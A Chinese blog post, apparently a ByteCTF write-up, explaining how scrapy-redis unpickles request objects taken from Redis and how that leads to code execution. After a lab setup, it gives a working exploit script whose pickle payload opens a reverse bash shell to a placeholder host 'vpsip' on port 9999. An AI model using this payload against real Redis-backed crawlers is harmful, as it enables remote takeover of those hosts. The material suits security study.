<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="bytectf告诉了我,i’m five. 赛后研究了一下发个文章做个分享吧….. 1、前言分布式爬取　　您可以启动多个spider工程，相互之间共享单个redis的requests队列。最适合广泛的多个域名网站的内容爬取。分布式数据处理　　爬取到的scrapy的item数据可以推入到redis队列中，这意味着你可以根据需求启动尽可能多的处理程序来共享item的队列，进行item数据持久化处理Sc">
<meta property="og:type" content="article">
<meta property="og:title" content="从bytectf学到的scrapy-redis反序列化漏洞">
<meta property="og:url" content="https://xiaokou.top/posts/20216f54/index.html">
<meta property="og:site_name" content="suanve - Blog">
<meta property="og:description" content="bytectf告诉了我,i’m five. 赛后研究了一下发个文章做个分享吧….. 1、前言分布式爬取　　您可以启动多个spider工程，相互之间共享单个redis的requests队列。最适合广泛的多个域名网站的内容爬取。分布式数据处理　　爬取到的scrapy的item数据可以推入到redis队列中，这意味着你可以根据需求启动尽可能多的处理程序来共享item的队列，进行item数据持久化处理Sc">
<meta property="og:locale" content="zh">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603697167721-ab1e665e-539d-4143-bde6-e17f1f8bca2f.png#align=left&amp;display=inline&amp;height=367&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=734&amp;originWidth=957&amp;size=439218&amp;status=done&amp;style=none&amp;width=478.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603697912625-5996f707-6330-46e3-88d7-6a7056909ce8.png#align=left&amp;display=inline&amp;height=233&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=466&amp;originWidth=724&amp;size=185921&amp;status=done&amp;style=none&amp;width=362">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698392744-31bcd428-e175-4b57-993d-6d8c47db17dd.png#align=left&amp;display=inline&amp;height=225&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=450&amp;originWidth=1664&amp;size=144024&amp;status=done&amp;style=none&amp;width=832">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698420568-65844263-4b06-48ad-8536-a6feca89b40f.png#align=left&amp;display=inline&amp;height=85&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=170&amp;originWidth=386&amp;size=19856&amp;status=done&amp;style=none&amp;width=193">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698447710-40875615-c803-41d8-bdfe-3fb4533b7d26.png#align=left&amp;display=inline&amp;height=114&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=228&amp;originWidth=816&amp;size=15287&amp;status=done&amp;style=none&amp;width=408">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698465447-11806513-e268-4726-8eb3-cc12656b7afd.png#align=left&amp;display=inline&amp;height=105&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=210&amp;originWidth=706&amp;size=36095&amp;status=done&amp;style=none&amp;width=353">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698500314-d14052e5-e3d7-45c9-acbc-157633df01c7.png#align=left&amp;display=inline&amp;height=970&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=1940&amp;originWidth=3360&amp;size=678315&amp;status=done&amp;style=none&amp;width=1680">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698520868-09d2123d-0a2a-460a-af98-bed3dff64f21.png#align=left&amp;display=inline&amp;height=307&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=614&amp;originWidth=1148&amp;size=86859&amp;status=done&amp;style=none&amp;width=574">
<meta property="article:published_time" content="2020-10-30T06:48:32.000Z">
<meta property="article:modified_time" content="2021-03-10T03:58:53.799Z">
<meta property="article:author" content="suanve">
<meta property="article:tag" content="python">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="scrapy-redis">
<meta property="article:tag" content="bytectf">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603697167721-ab1e665e-539d-4143-bde6-e17f1f8bca2f.png#align=left&amp;display=inline&amp;height=367&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=734&amp;originWidth=957&amp;size=439218&amp;status=done&amp;style=none&amp;width=478.5">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>从bytectf学到的scrapy-redis反序列化漏洞</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="suanve - Blog" type="application/atom+xml" />
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">文章</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/other">友链</a></li>
         
          <li><a href="https://github.com/suanve?tab=repositories" target="_blank" rel="noopener">项目</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/posts/69603afc/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/posts/8f41f755/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://xiaokou.top/posts/20216f54/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://xiaokou.top/posts/20216f54/&text=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://xiaokou.top/posts/20216f54/&is_video=false&description=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=从bytectf学到的scrapy-redis反序列化漏洞&body=Check out this article: https://xiaokou.top/posts/20216f54/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://xiaokou.top/posts/20216f54/&title=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://xiaokou.top/posts/20216f54/&name=从bytectf学到的scrapy-redis反序列化漏洞&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://xiaokou.top/posts/20216f54/&t=从bytectf学到的scrapy-redis反序列化漏洞" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#1、前言"><span class="toc-number">1.</span> <span class="toc-text">1、前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2、配置环境"><span class="toc-number">2.</span> <span class="toc-text">2、配置环境</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#a-创建scrapy项目"><span class="toc-number">2.1.</span> <span class="toc-text">a.创建scrapy项目</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#b-配置redis与mongodb"><span class="toc-number">2.2.</span> <span class="toc-text">b.配置redis与mongodb</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#c-修改scrapy"><span class="toc-number">2.3.</span> <span class="toc-text">c.修改scrapy</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3、漏洞利用"><span class="toc-number">3.</span> <span class="toc-text">3、漏洞利用</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        从bytectf学到的scrapy-redis反序列化漏洞
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">suanve</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-10-30T06:48:32.000Z" itemprop="datePublished">2020-10-30</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/bytectf/" rel="tag">bytectf</a>, <a class="tag-link" href="/tags/ctf/" rel="tag">ctf</a>, <a class="tag-link" href="/tags/python/" rel="tag">python</a>, <a class="tag-link" href="/tags/scrapy-redis/" rel="tag">scrapy-redis</a>, <a class="tag-link" href="/tags/writeup/" rel="tag">writeup</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>bytectf告诉了我,i’m five.</p>
<p>赛后研究了一下发个文章做个分享吧…..</p>
<h3 id="1、前言"><a href="#1、前言" class="headerlink" title="1、前言"></a>1、前言</h3><p><img src="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603697167721-ab1e665e-539d-4143-bde6-e17f1f8bca2f.png#align=left&amp;display=inline&amp;height=367&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=734&amp;originWidth=957&amp;size=439218&amp;status=done&amp;style=none&amp;width=478.5" alt="image.png"><br>分布式爬取<br>　　您可以启动多个spider工程，相互之间共享单个redis的requests队列。最适合广泛的多个域名网站的内容爬取。<br>分布式数据处理<br>　　爬取到的scrapy的item数据可以推入到redis队列中，这意味着你可以根据需求启动尽可能多的处理程序来共享item的队列，进行item数据持久化处理<br>Scrapy即插即用组件<br>　　Scheduler调度器 + Duplication复制 过滤器，Item Pipeline，基本spider</p>
<p>scrapy的整体架构就不多说了，自己去看文档吧，这里重点说一下分布式爬取的特征。<br><strong>您可以启动多个spider工程，相互之间共享单个redis的requests队列。最适合广泛的多个域名网站的内容爬取。</strong><br><strong><img src="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603697912625-5996f707-6330-46e3-88d7-6a7056909ce8.png#align=left&amp;display=inline&amp;height=233&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=466&amp;originWidth=724&amp;size=185921&amp;status=done&amp;style=none&amp;width=362" alt="image.png"></strong><br>scrapy的工作流程如图，说人话：</p>
<ol>
<li>首先Slaver端从Master端拿任务（Request、url）进行数据抓取，Slaver抓取数据的同时，产生新任务的Request便提交给 Master 处理；</li>
<li>Master端只有一个Redis数据库，负责将未处理的Request去重和任务分配，将处理后的Request加入待爬队列，并且存储爬取的数据。</li>
</ol>
<p>Scrapy-Redis默认使用的就是这种策略，我们实现起来很简单，因为任务调度等工作Scrapy-Redis都已经帮我们做好了，我们只需要继承RedisSpider、指定redis_key就行了。<br>缺点是，Scrapy-Redis调度的任务是Request对象，里面信息量比较大（不仅包含url，还有callback函数、headers等信息），<br>**<br>scrapy-redis中都是用key-value形式存储数据，其中有几个常见的key-value形式：<br>1、 “项目名:items”  –&gt;list 类型，保存爬虫获取到的数据item 内容是 json 字符串<br>2、 “项目名:dupefilter”   –&gt;set类型，用于爬虫访问的URL去重 内容是 40个字符的 url 的hash字符串<br>3、 “项目名: start_urls”   –&gt;List 类型，用于获取spider启动时爬取的第一个url<br>4、 “项目名:requests”   –&gt;zset类型，用于scheduler调度处理 requests 内容是 request 对象的序列化 字符串</p>
<p>好了看到这里想到了什么没？<strong>Scrapy-Redis调度的任务是Request对象</strong></p>
<p>当我们需要通过分布式爬虫系统爬取url时 我们一般会在redis中给key:<strong>项目名:start_urls</strong> push一条url,随后scrapy会获取该条url 进行爬行。<br>那我们给redis中key:*<em>项目名:requests *</em>push一条request对象序列化的字符串时,scrapy会获取该字符串 将其反序列化。这应该也就是bytectf那道easey_scrapy的考点了。</p>
<h3 id="2、配置环境"><a href="#2、配置环境" class="headerlink" title="2、配置环境"></a>2、配置环境</h3><h4 id="a-创建scrapy项目"><a href="#a-创建scrapy项目" class="headerlink" title="a.创建scrapy项目"></a>a.创建scrapy项目</h4><p><code>python3 -m scrapy startproject people</code><br>创建一个项目people<br><code>python3 -m scrapy genspider mypeople people.com.cn</code><br>创建一个爬虫</p>
<p>$ tree ./<br>./<br>├── people    #项目目录<br>│   ├── <strong>init</strong>.py<br>│   ├── <strong>pycache</strong><br>│   │   ├── <strong>init</strong>.cpython-38.pyc<br>│   │   ├── items.cpython-38.pyc<br>│   │   ├── pipelines.cpython-38.pyc<br>│   │   └── settings.cpython-38.pyc<br>│   ├── items.py                #负责数据模型的建立，类似于实体类。定义我们所要爬取的信息的相关属性。<br>│   ├── middlewares.py      #自己定义的中间件。可以定义相关的方法，用以处理蜘蛛的响应输入和请求输出。 暂时用不到<br>│   ├── pipelines.py           #负责对spider返回数据的处理。<br>│   ├── settings.py            #相关设置<br>│   └── spiders                 #负责存放继承自scrapy的爬虫类。<br>│       ├── <strong>init</strong>.py<br>│       ├── <strong>pycache</strong><br>│       │   ├── <strong>init</strong>.cpython-38.pyc<br>│       │   └── mypeople.cpython-38.pyc<br>│       └── mypeople.py        #爬虫<br>├── scrapy.cfg                    #基础配置</p>
<h4 id="b-配置redis与mongodb"><a href="#b-配置redis与mongodb" class="headerlink" title="b.配置redis与mongodb"></a>b.配置redis与mongodb</h4><p>配置redis<br><code>docker run -d -p 6379:6379 redis  --requirepass "123456"</code><br>密码为123456</p>
<p><code>docker run -itd --name mongo -p 27017:27017 mongo --auth</code><br>创建mongodb<br><code>docker exec -it mongo mongo admin</code><br>创建超级用户<br><code>db.createUser({user:"root",pwd:"root",roles:["root"]})</code></p>
<h4 id="c-修改scrapy"><a href="#c-修改scrapy" class="headerlink" title="c.修改scrapy"></a>c.修改scrapy</h4><p>修改pipelines.py为</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Define your item pipelines here</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Don't forget to add your pipeline to the ITEM_PIPELINES setting</span></span><br><span class="line"><span class="comment"># See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html</span></span><br><span class="line"><span class="keyword">import</span> pymongo</span><br><span class="line"><span class="comment"># useful for handling different item types with a single interface</span></span><br><span class="line"><span class="keyword">from</span> itemadapter <span class="keyword">import</span> ItemAdapter</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PeoplePipeline</span>:</span></span><br><span class="line"> <span class="comment"># \xe8\xbf\x9e\xe6\x8e\xa5\xe6\x95\xb0\xe6\x8d\xae\xe5\xba\x93</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self)</span>:</span></span><br><span class="line">        <span class="comment"># \xe8\x8e\xb7\xe5\x8f\x96\xe6\x95\xb0\xe6\x8d\xae\xe5\xba\x93\xe8\xbf\x9e\xe6\x8e\xa5\xe4\xbf\xa1\xe6\x81\xaf</span></span><br><span class="line">        <span class="comment"># 获取数据库连接信息</span></span><br><span class="line">        MONGODB_HOST = <span class="string">'127.0.0.1'</span></span><br><span class="line">        MONGODB_PORT = <span class="number">27017</span></span><br><span class="line">        MONGODB_DBNAME = <span class="string">'admin'</span></span><br><span class="line">        MONGODB_TABLE = <span class="string">'admin'</span></span><br><span class="line">        MONGODB_USER = <span class="string">'admin'</span></span><br><span class="line">        MONGODB_PASSWD = <span class="string">'123456'</span></span><br><span class="line">        mongo_client = pymongo.MongoClient(<span class="string">"%s:%d"</span> % (MONGODB_HOST, MONGODB_PORT))</span><br><span class="line">        mongo_client[MONGODB_DBNAME].authenticate(MONGODB_USER, MONGODB_PASSWD, MONGODB_DBNAME)</span><br><span class="line">        mongo_db = mongo_client[MONGODB_DBNAME]</span><br><span class="line">        self.table = mongo_db[MONGODB_TABLE]</span><br><span class="line">    <span class="comment"># \xe5\xa4\x84\xe7\x90\x86item</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">process_item</span><span class="params">(self, item, spider)</span>:</span></span><br><span class="line">        <span class="comment"># \xe4\xbd\xbf\xe7\x94\xa8dict\xe8\xbd\xac\xe6\x8d\xa2item\xef\xbc\x8c\xe7\x84\xb6\xe5\x90\x8e\xe6\x8f\x92\xe5\x85\xa5\xe6\x95\xb0\xe6\x8d\xae\xe5\xba\x93</span></span><br><span class="line">        <span class="comment"># 使用dict转换item，然后插入数据库</span></span><br><span class="line">        quote_info = dict(item)</span><br><span class="line">        print(quote_info)</span><br><span class="line">        self.table.insert(quote_info)</span><br><span class="line">        <span class="keyword">return</span> item</span><br></pre></td></tr></tbody></table></figure>

<p>修改settings.py 添加</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">RETRY_ENABLED = <span class="literal">False</span></span><br><span class="line">ROBOTSTXT_OBEY = <span class="literal">False</span></span><br><span class="line">SCHEDULER_PERSIST = <span class="literal">True</span></span><br><span class="line">DOWNLOAD_TIMEOUT = <span class="number">8</span></span><br><span class="line">USER_AGENT = <span class="string">'scrapy_redis'</span></span><br><span class="line">SCHEDULER = <span class="string">"scrapy_redis.scheduler.Scheduler"</span></span><br><span class="line">DUPEFILTER_CLASS = <span class="string">"scrapy_redis.dupefilter.RFPDupeFilter"</span></span><br><span class="line">REDIS_HOST = <span class="string">'127.0.0.1'</span></span><br><span class="line">REDIS_PORT = <span class="number">6379</span></span><br><span class="line">REDIS_PARAMS = { <span class="string">'password'</span>: <span class="string">'123456'</span>, }</span><br><span class="line"><span class="comment"># 数据保存在redis中</span></span><br><span class="line">ITEM_PIPELINES = {</span><br><span class="line">   <span class="string">'people.pipelines.PeoplePipeline'</span>: <span class="number">300</span>,</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>


<p>修改items.py为</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> scrapy</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">PeopleItem</span><span class="params">(scrapy.Item)</span>:</span></span><br><span class="line">    <span class="comment"># define the fields for your item here like:</span></span><br><span class="line">    <span class="comment"># name = scrapy.Field()</span></span><br><span class="line">    <span class="comment">#新闻标题、时间、url、文章内容</span></span><br><span class="line">    byte_start = scrapy.Field()<span class="comment">#\xe8\xb5\xb7\xe5\xa7\x8b\xe9\xa1\xb5\xe9\x9d\xa2 起始页面</span></span><br><span class="line">    byte_url = scrapy.Field()<span class="comment">#\xe5\xbd\x93\xe5\x89\x8d\xe9\xa1\xb5\xe9\x9d\xa2 当前页面</span></span><br><span class="line">    byte_text = scrapy.Field()<span class="comment">#text</span></span><br></pre></td></tr></tbody></table></figure>


<p>修改spiders/mypeople.py为</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> scrapy</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> scrapy_redis.spiders <span class="keyword">import</span> RedisSpider</span><br><span class="line"><span class="keyword">from</span> people.items <span class="keyword">import</span> PeopleItem</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MypeopleSpider</span><span class="params">(RedisSpider)</span>:</span></span><br><span class="line">    name = <span class="string">'mypeople'</span></span><br><span class="line">    <span class="comment"># allowed_domains = ['people.com.cn']</span></span><br><span class="line">    <span class="comment"># start_urls = ['http://politics.people.com.cn/GB/1024/index1.html']</span></span><br><span class="line">    redis_key = <span class="string">"mypeople:start_url"</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">parse</span><span class="params">(self, response)</span>:</span></span><br><span class="line">        byte_item = PeopleItem()</span><br><span class="line">        byte_item[<span class="string">'byte_start'</span>] = response.request.url<span class="comment">#\xe4\xb8\xbb\xe9\x94\xae\xef\xbc\x8c\xe5\x8e\x9f\xe5\xa7\x8burl</span></span><br><span class="line">        url_list = []</span><br><span class="line">        test = response.xpath(<span class="string">'//a/@href'</span>).getall()</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> test:</span><br><span class="line">            <span class="keyword">if</span> i[<span class="number">0</span>] == <span class="string">'/'</span>:</span><br><span class="line">                url = response.request.url + i</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                url = i</span><br><span class="line">            <span class="keyword">if</span> re.search(<span class="string">r'://'</span>,url):</span><br><span class="line">                r = scrapy.Request(url,callback=self.parse2,dont_filter=<span class="literal">True</span>)</span><br><span class="line">                r.meta[<span class="string">'item'</span>] = byte_item</span><br><span class="line">                <span class="keyword">yield</span> r</span><br><span class="line">            url_list.append(url)</span><br><span class="line">            <span class="keyword">if</span>(len(url_list)&gt;<span class="number">3</span>):</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        byte_item[<span class="string">'byte_url'</span>] = response.request.url</span><br><span class="line">        byte_item[<span class="string">'byte_text'</span>] = base64.b64encode((response.text).encode(<span class="string">'utf-8'</span>))</span><br><span class="line">        <span class="keyword">yield</span> byte_item</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">parse2</span><span class="params">(self,response)</span>:</span></span><br><span class="line">        item = response.meta[<span class="string">'item'</span>]</span><br><span class="line">        item[<span class="string">'byte_url'</span>] = response.request.url</span><br><span class="line">        item[<span class="string">'byte_text'</span>] = base64.b64encode((response.text).encode(<span class="string">'utf-8'</span>))</span><br><span class="line">        <span class="keyword">yield</span> item</span><br></pre></td></tr></tbody></table></figure>


<h3 id="3、漏洞利用"><a href="#3、漏洞利用" class="headerlink" title="3、漏洞利用"></a>3、漏洞利用</h3><p>直接放脚本，创建一个恶意的对象,将其序列化后的字符串放到<strong>mypeople:requests</strong>中</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> redis</span><br><span class="line"><span class="keyword">import</span> pickle  <span class="comment"># 序列化库</span></span><br><span class="line"><span class="keyword">import</span> datetime</span><br><span class="line"></span><br><span class="line">myredis = redis.Redis(host=<span class="string">"127.0.0.1"</span>, password=<span class="string">"123456"</span>, port=<span class="number">6379</span>)</span><br><span class="line">print(myredis.info())</span><br><span class="line">url = <span class="string">"file:///etc/passwd"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">exp</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line">        s = <span class="string">"""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("vpsip",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'"""</span></span><br><span class="line">        <span class="keyword">return</span> (os.system, (s,))</span><br><span class="line"></span><br><span class="line">e = exp()</span><br><span class="line">s = pickle.dumps(e)</span><br><span class="line">evil_obj = {}</span><br><span class="line">evil_obj.setdefault(s,<span class="number">1</span>)</span><br><span class="line">myredis.zadd(name=<span class="string">"mypeople:requests"</span>, mapping=evil_obj)</span><br><span class="line"></span><br><span class="line"><span class="comment"># myredis.lpush("mypeople:start_url", url)</span></span><br><span class="line"><span class="comment"># myredis.lpush("mypeople:start_url", url)</span></span><br></pre></td></tr></tbody></table></figure>


<p>**<br>运行该爬虫<br><img src="https://cdn.nlark.com/yuque/0/2020/png/1621975/1603698392744-31bcd428-e175-4b57-993d-6d8c47db17dd.png#align=left&amp;display=inline&amp;height=225&amp;margin=%5Bobject%20Object%5D&amp;name=image.png&amp;originHeight=450&amp;originWidth=1664&amp;size=144024&amp;status=done&amp;style=none&amp;width=832" alt="image.png"></p>
